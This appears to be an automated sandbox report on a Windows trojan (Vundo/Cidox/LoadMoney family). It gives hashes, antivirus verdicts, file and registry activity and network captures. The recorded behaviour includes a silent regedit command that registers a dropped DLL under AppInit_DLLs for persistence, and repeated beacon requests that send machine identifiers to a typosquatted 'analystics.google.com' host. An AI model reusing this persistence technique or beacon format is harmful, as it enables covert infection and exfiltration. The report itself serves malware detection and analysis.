Analysis Date2015-01-16 16:27:13
MD5104cdff13c1b880a4acebe1c6da24bd6
SHA186f1025aac9b7303ce167084f522ecf7b67c28ea

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionCODE md5: a2dc24a95e90f82cb4926bb9d950942d sha1: 7372cfa8c984161e168ee94b4e7d0bc68e107c32 size: 129024
SectionDATA md5: ebe7fcecc1bc793477929e46fd5db6ec sha1: 48c754e52146eaa9e3da0452fb17a6c03c10e494 size: 7168
SectionBSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: b8021ddb18f69448fa12a7869f24464a sha1: 6846bff00ae9365e0afb3e90966887dcfe100f07 size: 2048
Section.reloc md5: f8856b7cc160e6ea65959c7c597fa61f sha1: 74d7f8bde7a559a39d47314756afa04dd381f436 size: 6656
Section.rsrc md5: d5d1701b235d842798701902f4f2c238 sha1: ce1aab3589310a284a466e50ca1208b14649361a size: 2560
Timestamp1992-06-22 01:34:17
PEhashd1d574505329973b7562bafa07888768fbaff728
IMPhashe80ebfb404a0444c6f31da5db62e6eb5
AV360 Safeno_virus
AVAd-AwareGen:Variant.Kazy.408
AVAlwil (avast)no_virus
AVArcabit (arcavir)Gen:Variant.Kazy.408
AVAuthentiumno_virus
AVAvira (antivir)TR/Kazy.66926.20
AVBullGuardGen:Variant.Kazy.408
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. WebTrojan.LoadMoney.225
AVEmsisoftBackdoor.Win32.Cidox
AVEset (nod32)Win32/Kryptik.AVWN
AVFortinetW32/Kryptik.WIE!tr
AVFrisk (f-prot)no_virus
AVF-SecureGen:Variant.Kazy.408
AVGrisoft (avg)Generic31.CKOA
AVIkarusTrojan-Downloader.Win32.Vundo
AVK7Trojan ( 7000000f1 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesno_virus
AVMcafeeno_virus
AVMicrosoft Security EssentialsTrojanDropper:Win32/Vundo.AA
AVMicroWorld (escan)Gen:Variant.Kazy.408
AVRisingno_virus
AVSophosTroj/LdMon-D
AVSymantecDownloader
AVTrend MicroTROJ_SPNR.0BFC13
AVVirusBlokAda (vba32)Backdoor.Cidox

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\system32\hnlkwmh.dll
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNSknockdast.com
Winsock DNSclickbeta.ru
Winsock DNSknresszip.com
Winsock DNS91.220.35.154
Winsock DNSveroconma.com
Winsock DNSterrans.su
Winsock DNSgetinball.com
Winsock DNStheloamva.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdentagod.com
Winsock DNSdenareclick.com
Winsock DNSfescheck.com
Winsock DNSdebijonda.com
Winsock DNSliteworns.com
Winsock DNSgetintsu.com
Winsock DNSnshouse1.com
Winsock DNSnetrovad.com
Winsock DNSvengibit.com
Winsock DNStryangets.com
Winsock DNSvornedix.com
Winsock DNSinzavora.com
Winsock DNSgetavodes.com
Winsock DNSdegoog1etag.com
Winsock DNSkndeszip.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\hnlkwmh.dll\\x00

Network Details:

DNSknockdast.com
Type: A
208.73.211.178
DNSknockdast.com
Type: A
208.73.210.200
DNSknockdast.com
Type: A
208.73.210.214
DNSknockdast.com
Type: A
208.73.210.217
DNSdebijonda.com
Type: A
209.99.40.223
DNSveroconma.com
Type: A
74.117.179.241
DNStheloamva.com
Type: A
209.222.14.3
DNSvornedix.com
Type: A
209.222.14.3
DNSdentagod.com
Type: A
209.222.14.3
DNSliteworns.com
Type: A
209.222.14.3
DNSvengibit.com
Type: A
209.222.14.3
DNStryangets.com
Type: A
209.222.14.3
DNSgetintsu.com
Type: A
109.234.109.82
DNSinzavora.com
Type: A
109.234.109.76
DNSknresszip.com
Type: A
DNSdegoog1etag.com
Type: A
DNSgetinball.com
Type: A
DNSkndeszip.com
Type: A
DNSgetavodes.com
Type: A
DNStryatdns.com
Type: A
DNSfescheck.com
Type: A
DNSnetrovad.com
Type: A
DNSterrans.su
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSnshouse1.com
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2723&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg9gNhHyiy5opgxuYFhW1CsjDmh312rvqQ4wCmc9n5nL/
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2723&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg9gNhHyiy5opgxuYFhW1CsjDmh312rvqQ+ghWll6NamH
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2723&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg9gNhHyiy5opgxuYFhW1CsjDmh312rvqQzjIrSdLPnwF
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2723&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg9gNhHyiy5opgxuYFhW1CsjDmh312rvqQzjIrSdLPnwF
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2723&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg9gNhHyiy5opgxuYFhW1CsjDmh312rvqQxY8na97bOwH
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2723&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg9gNhHyiy5opgxuYFhW1CsjDmh312rvqQxY8na97bOwH
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2723&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg9gNhHyiy5opgxuYFhW1CsjDmh312rvqQ20EF7Fyeevf
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2723&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg9gNhHyiy5opgxuYFhW1CsjDmh312rvqQxXDuLoYpyRu
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2723&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg9gNhHyiy5opgxuYFhW1CsjDmh312rvqQxXDuLoYpyRu
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2723&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg9gNhHyiy5opgxuYFhW1CsjDmh312rvqQxXDuLoYpyRu
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2723&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg9gNhHyiy5opgxuYFhW1CsjDmh312rvqQxXDuLoYpyRu
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2723&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg9gNhHyiy5opgxuYFhW1CsjDmh312rvqQ3T05itqvGNd
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 208.73.211.178:80
Flows TCP192.168.1.1:1032 ➝ 209.99.40.223:80
Flows TCP192.168.1.1:1033 ➝ 74.117.179.241:80
Flows TCP192.168.1.1:1034 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1035 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1036 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1037 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1038 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1039 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1040 ➝ 109.234.109.82:80
Flows TCP192.168.1.1:1041 ➝ 109.234.109.76:80
Flows TCP192.168.1.1:1042 ➝ 91.220.35.154:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 37323326   XX0000&key=2723&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796739 674e6848 79697935 6f706778   Wyg9gNhHyiy5opgx
0x000000b0 (00176)   75594668 57314373 6a446d68 33313272   uYFhW1CsjDmh312r
0x000000c0 (00192)   76715134 77436d63 396e356e 4c2f2048   vqQ4wCmc9n5nL/ H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 37323326   XX0000&key=2723&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796739 674e6848 79697935 6f706778   Wyg9gNhHyiy5opgx
0x000000b0 (00176)   75594668 57314373 6a446d68 33313272   uYFhW1CsjDmh312r
0x000000c0 (00192)   7671512b 6768576c 6c364e61 6d482048   vqQ+ghWll6NamH H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 37323326   XX0000&key=2723&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796739 674e6848 79697935 6f706778   Wyg9gNhHyiy5opgx
0x000000b0 (00176)   75594668 57314373 6a446d68 33313272   uYFhW1CsjDmh312r
0x000000c0 (00192)   7671517a 6a497253 644c506e 77462048   vqQzjIrSdLPnwF H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 37323326   XX0000&key=2723&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796739 674e6848 79697935 6f706778   Wyg9gNhHyiy5opgx
0x000000b0 (00176)   75594668 57314373 6a446d68 33313272   uYFhW1CsjDmh312r
0x000000c0 (00192)   7671517a 6a497253 644c506e 77462048   vqQzjIrSdLPnwF H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 37323326   XX0000&key=2723&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796739 674e6848 79697935 6f706778   Wyg9gNhHyiy5opgx
0x000000b0 (00176)   75594668 57314373 6a446d68 33313272   uYFhW1CsjDmh312r
0x000000c0 (00192)   76715178 59386e61 3937624f 77482048   vqQxY8na97bOwH H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 37323326   XX0000&key=2723&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796739 674e6848 79697935 6f706778   Wyg9gNhHyiy5opgx
0x000000b0 (00176)   75594668 57314373 6a446d68 33313272   uYFhW1CsjDmh312r
0x000000c0 (00192)   76715178 59386e61 3937624f 77482048   vqQxY8na97bOwH H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 37323326   XX0000&key=2723&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796739 674e6848 79697935 6f706778   Wyg9gNhHyiy5opgx
0x000000b0 (00176)   75594668 57314373 6a446d68 33313272   uYFhW1CsjDmh312r
0x000000c0 (00192)   76715132 30454637 46796565 76662048   vqQ20EF7Fyeevf H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 37323326   XX0000&key=2723&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796739 674e6848 79697935 6f706778   Wyg9gNhHyiy5opgx
0x000000b0 (00176)   75594668 57314373 6a446d68 33313272   uYFhW1CsjDmh312r
0x000000c0 (00192)   76715178 5844754c 6f597079 52752048   vqQxXDuLoYpyRu H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 37323326   XX0000&key=2723&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796739 674e6848 79697935 6f706778   Wyg9gNhHyiy5opgx
0x000000b0 (00176)   75594668 57314373 6a446d68 33313272   uYFhW1CsjDmh312r
0x000000c0 (00192)   76715178 5844754c 6f597079 52752048   vqQxXDuLoYpyRu H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 37323326   XX0000&key=2723&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796739 674e6848 79697935 6f706778   Wyg9gNhHyiy5opgx
0x000000b0 (00176)   75594668 57314373 6a446d68 33313272   uYFhW1CsjDmh312r
0x000000c0 (00192)   76715178 5844754c 6f597079 52752048   vqQxXDuLoYpyRu H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 37323326   XX0000&key=2723&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796739 674e6848 79697935 6f706778   Wyg9gNhHyiy5opgx
0x000000b0 (00176)   75594668 57314373 6a446d68 33313272   uYFhW1CsjDmh312r
0x000000c0 (00192)   76715178 5844754c 6f597079 52752048   vqQxXDuLoYpyRu H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 37323326   XX0000&key=2723&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796739 674e6848 79697935 6f706778   Wyg9gNhHyiy5opgx
0x000000b0 (00176)   75594668 57314373 6a446d68 33313272   uYFhW1CsjDmh312r
0x000000c0 (00192)   76715133 54303569 74717647 4e642048   vqQ3T05itqvGNd H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....


Strings
...
k...X|w...
. 
k
.
..k..|w|wQ.).
U!dI..
.p.i..
k
k
..k....|w
............
.
..a.SI
...
.k.
........k2?..
(.P
.
.
..
{
....k..
1000
63yt6_tt9
ancel
_azd5xg
C_EULACHECK
Dialog
d--pmo95jw
DVCLAL
Features
frmtct+fy6ukx8m 
Generic1
jkh_x
LDAP
list
Modal
Module
msctls_progress32
MS Serif
NEW.T
NT AUTHORITY
ozo5e#
PACKAGEINFO
Progress
qs5ncd w-d#u78dxgl8tc
r5hisnf78_d _+
restore
Restored
support 
TEXTFILEDLG
TREEDATA
Windows 
y_4#u4
0 0*000>0E0P0V0\0c0u0}0
0$0*0?0E0L0S0]0k0t0
0*010<0B0H0O0l0s0
0*040=0C0I0Q0e0k0x0
?&?+?0?5?;?K?Q?Y?_?l?~?
:0:6:>:D:L:R:[:|:
<%<*<0<6<><D<N<^<h<n<{<
;#;*;0;7;J;Z;`;j;s;z;
:$:*:0:8:>:E:K:Q:W:
(/1!*096?.;0&9' >8." 0'!<,/>+5- +%(,(A!
1&101@1O1[1g1q1{1
1"1(1.1<1V1\1f1y1
1$1*12171G1M1S1a1k1r1{1
151K1Q1[1e1k1~1
1;7%%:
>&>1>8>D>J>P>Z>d>k>q>{>
1TE|y]
1WagxbFm
2%222@2G2S2[2a2g2s2
2)232N2X2^2h2o2x2~2
282C2P2V2\2b2t2
>#>(>->2>8>I>R>Z>d>q>w>
292C2O2U2_2e2n2~2
3&3,323<3B3L3R3f3l3v3|3
3!3'3.343=3C3H3Y3a3l3u3
